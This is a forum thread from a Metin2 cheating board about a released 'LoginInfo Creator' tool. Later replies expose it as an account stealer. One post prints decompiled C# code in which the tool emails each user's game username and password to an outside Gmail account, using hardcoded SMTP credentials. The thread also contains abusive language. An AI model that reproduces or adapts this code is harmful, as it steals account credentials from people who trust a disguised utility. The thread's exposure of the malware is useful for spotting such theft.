Register for your free account! | Forgot your password?

You last visited: Today at 01:17

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[RELEASE] LoginInfo Creator

Discussion on [RELEASE] LoginInfo Creator within the Metin2 Hacks, Bots, Cheats, Exploits & Macros forum part of the Metin2 category.

Reply
 
Old   #1
 
elite*gold: 0
Join Date: Nov 2012
Posts: 7
Received Thanks: 1
[RELEASE] LoginInfo Creator

Hello, I just finished work and I created a Login Info Creator.
Input name,password, server, character place and the logininfo.py file will be automatically created.
Download attachment.

How to install :
Download file
Move in metin2 folder
Extract file here
Open LoginInfo Creator.exe
Input your details.
That's all, click Create and the file will be created.
About character place:
-0 Front
-1 Right
-2 two times Right
-3 Left

If you want to comment, please do it in English, i don't understand German or others.
Virus total :
Thanks to : for some code
Attached Files
File Type: zip LoginInfo Creator.zip (8.8 KB, 306 views)
mihail21222 is offline  
Thanks
1 User
Old 01/03/2013, 09:57   #2
 
marykillsjane's Avatar
 
elite*gold: 0
Join Date: Sep 2010
Posts: 1,909
Received Thanks: 522
Quote:
Originally Posted by mihail21222 View Post
Hello, I just finished work and I created a Login Info Creator.
Input name,password, server, character place and the logininfo.py file will be automatically created.
Download attachment.

If you want to comment, please do it in English, i don't understand German or others.
Virus total :
Naja einfach ein Programm erstellt was mittels dem tut von Kamer ne logininfo.py erzeugt ,und vorher die Variablen abfragt und an die richtige stelle schreibt ist nicht wirklich nötig released zu werden finde ich^^,besonders aber nicht ohne Credits anzugeben.

Das lustige ist ,dass ich genaudasselbe gestern gemacht habe ,mit der ausnahme das mein Programm in einer endlosschleife prüft ob auch der metin2 client ( das Fenster) noch offen ist wenn es geschlossen wird durch einen eventuellen Fehler öffnet es sich halt immer wieder von selbst ,und durch kamers logininfo loggt er so auch direkt wd ein,aber wiegesagt ist ne Spielerei aber ich denke nicht ,dass es jmd braucht und vor allem solltest du Credits angeben .
marykillsjane is offline  
Old 01/03/2013, 10:01   #3
 
elite*gold: 0
Join Date: Nov 2012
Posts: 7
Received Thanks: 1
I used google translate and i saw that you say that i don't give the credits.
Oh well, i created the code from 0 in visual basic .
The rest of your post, i don't understood
mihail21222 is offline  
Old 01/03/2013, 10:04   #4
 
marykillsjane's Avatar
 
elite*gold: 0
Join Date: Sep 2010
Posts: 1,909
Received Thanks: 522
I mean you should give Kamer Credits for this Thread

Cause he created the Python file, and your Programm is based on his Thread .
marykillsjane is offline  
Old 01/03/2013, 10:07   #5
 
elite*gold: 0
Join Date: Nov 2012
Posts: 7
Received Thanks: 1
It's not 100% his code but thanks i will put his credits
mihail21222 is offline  
Old 01/03/2013, 10:15   #6
 
marykillsjane's Avatar
 
elite*gold: 0
Join Date: Sep 2010
Posts: 1,909
Received Thanks: 522
I know its your Programm ,but because you work with his file you should add him credits

You should make also a feature ,if the client closes crashes or whatever that your prgramm start the client new ,you know what i mean?
marykillsjane is offline  
Old 01/03/2013, 10:17   #7
 
elite*gold: 0
Join Date: Nov 2012
Posts: 7
Received Thanks: 1
I know what are you trying to say, i wll try to add that feauture
mihail21222 is offline  
Old 01/03/2013, 12:32   #8
 
elite*gold: 0
Join Date: Jan 2013
Posts: 7
Received Thanks: 5
Hey.. Virüs.. GMail SMPT ..
MaRCoPoLo01 is offline  
Thanks
4 Users
Old 01/03/2013, 13:36   #9
 
elite*gold: 0
Join Date: Apr 2011
Posts: 7
Received Thanks: 1
NO keylogger, it's clear .
adykent007 is offline  
Old 01/03/2013, 14:48   #10
 
elite*gold: 0
Join Date: Dec 2009
Posts: 101
Received Thanks: 167
Code inside this program :

FUCK YOU, MOTHER FUCKER ROMANIAN
THIS IS AN ACCOUNT STEALER!!!
email
pass 147258369dan

Sugi pula ba ca ne faci de ras, cacat ce esti!
3t3r4n is offline  
Thanks
3 Users
Old 01/24/2013, 20:11   #11
 
evasmoky's Avatar
 
elite*gold: 0
Join Date: Aug 2011
Posts: 25
Received Thanks: 1
MailMessage message = new MailMessage();
message.Subject = "AutoLog";
message.To.Add("");
message.From = new MailAddress("");
message.Body = " Nume " + this.TextBox1.Text + " Parola " + this.TextBox2.Text + " Server " + this.TextBox3.Text + " CH " + this.TextBox4.Text;
SmtpClient client = new SmtpClient("smtp.gmail.com");
client.EnableSsl = true;
client.Credentials = new NetworkCredential("desenele.mele", "1599951dan");
client.Port = Conversions.ToInteger("587");
client.Send(message);
string path = @".\logininfo.py";
string[] strArray = new string[] { "import serverInfo", "serverNum=" + this.TextBox3.Text, "serverChannel=" + this.TextBox4.Text, "autoLogin=1", "autoSelect=1", "slot= " + this.TextBo.Text, "id=" + this.TextBox5.Text + this.TextBox1.Text + this.TextBox5.Text, "pwd=" + this.TextBox5.Text + this.TextBox2.Text + this.TextBox5.Text, "addr = serverInfo.REGION_DICT[0][serverNum][" + this.TextBox5.Text + "channel" + this.TextBox5.Text + "][serverChannel][" + this.TextBox5.Text + "ip" + this.TextBox5.Text + "]", "port = serverInfo.REGION_DICT[0][serverNum][" + this.TextBox5.Text + "channel" + this.TextBox5.Text + "][serverChannel][" + this.TextBox5.Text + "tcp_port" + this.TextBox5.Text + "]", "account_addr = serverInfo.REGION_AUTH_SERVER_DICT[0][serverNum][" + this.TextBox5.Text + "ip" + this.TextBox5.Text + "]", "account_port = serverInfo.REGION_AUTH_SERVER_DICT[0][serverNum][" + this.TextBox5.Text + "port" + this.TextBox5.Text + "]" };
StreamWriter writer = new StreamWriter(path, true);
int index = 0;
evasmoky is offline  
Old 01/24/2013, 23:22   #12
 
elite*gold: 0
Join Date: Jan 2013
Posts: 10
Received Thanks: 0
kramer create some one thread <.<
lucifera68 is offline  
Reply


Similar Threads Similar Threads
How2 .py Hacks ohne injekor/logininfo
11/01/2012 - Metin2 PServer Guides & Strategies - 184 Replies
Da es ein ziemliches durcheinander war und es viele aufgrund dessen nicht verstanden haben schreibe ich das Tut nochmal um in der Hoffnung das es nun von den meisten verstanden wird. Also es gibt eine möglichkeit .py Dateien ohne logininfo automatisch mitladen zu lassen wenn ihr den Clienten startet. Dazu muss man sich erstmal seine Python datei raussuchen welche man beim Start von Metin laden lassen will. Ich nehme jetzt als beispiel einen switchbot namens "switchbot.py". Nun geht...
question about logininfo.py
10/12/2012 - Metin2 Private Server - 3 Replies
Hayas there... I'm trying to make a simple function to test things out on metin by using this piece of code: But when I start metin I get an error about indentation error... I tried even with almost nothing and I still get the same error... I have the following line on logininfo.py "import lala" which imports the lala.py script
Logininfo.py
01/28/2012 - Metin2 - 0 Replies
Ich wollte mal wieder anfangen zu botten und habe dann auch für 3Clients eine Logininfo.py gemacht. Nur immer loggt sich der Char ein und während des Char Bildschirm loggt er sich wieder ein -> er kommt nicht ins Spiel rein. Meine logininfo.py sieht so aus: ######### server inform######### server information ############# import serverInfo serverNum=27 serverChannel=4 addr_new = serverInfo.REGION_DICT port_new = serverInfo.REGION_DICT
Logininfo geht nicht hilfe
10/08/2011 - Metin2 Private Server - 2 Replies
Hallo, ich hab heute versucht die Logininfo zu ändern. Hab eigentlich alles richtig gemacht wie es in diesen Video beschrieben wird: Metin2 P-server Willkommensnachicht ändern/ Login_info - YouTube Jetzt kommt keine Nachricht mehr also weder die Alte noch die Neue. Falls jemand mir bei dieser Sache helfen kann oder sogar
Logininfo
03/27/2010 - Metin2 Private Server - 5 Replies
Also ich wollte ma fragen ob jmd. weißt wie ich eine login info mache also zB. wenn man sich einloggt zum beispiel steht : Willkommen (Der Name des Spielers) auf NaToRMt2 Ich Hoffe Dir gefällts auf unserem Server mfg. Das NaToRMt2-Team :) Wer könnte mir helfen der kriegt n thx :)



All times are GMT +2. The time now is 01:17.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.